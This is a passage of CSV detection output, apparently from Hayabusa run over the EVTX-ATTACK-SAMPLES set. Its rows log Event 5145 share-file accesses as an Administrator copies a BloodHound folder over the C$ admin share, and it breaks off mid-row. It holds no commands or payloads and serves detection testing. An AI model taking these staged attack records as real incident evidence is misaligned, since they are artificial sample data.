10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\modules\library : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\stage : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-js\web : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.558 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\core-util-is\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.568 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\crc-32\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.578 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\order : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.588 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\position : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\lib\rank : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dagre\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.598 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\class : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\events : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\query : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\style : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.608 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\transition : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dom-helpers\util : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\dot-prop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\duplexer2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\electron-store : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.618 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\env-paths : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\eventemitter2\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exenv : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.628 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\exit-on-epipe : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\file-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\find-up : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fontfaceobserver\src : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.638 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\frac : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fs.realpath : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.648 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\fstream\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\glob : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.658 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graceful-fs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.668 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\alg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\lib\data : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.678 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\graphlib\node_modules\lodash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\hyphenate-style-name\.nyc_output : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.688 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\bin : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-size\lib\types : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\image-type : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.698 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\imurmurhash : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inflight : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inherits : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx -2019-03-18 23:23:24.708 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\inline-style-prefixer\dist : IP Address: 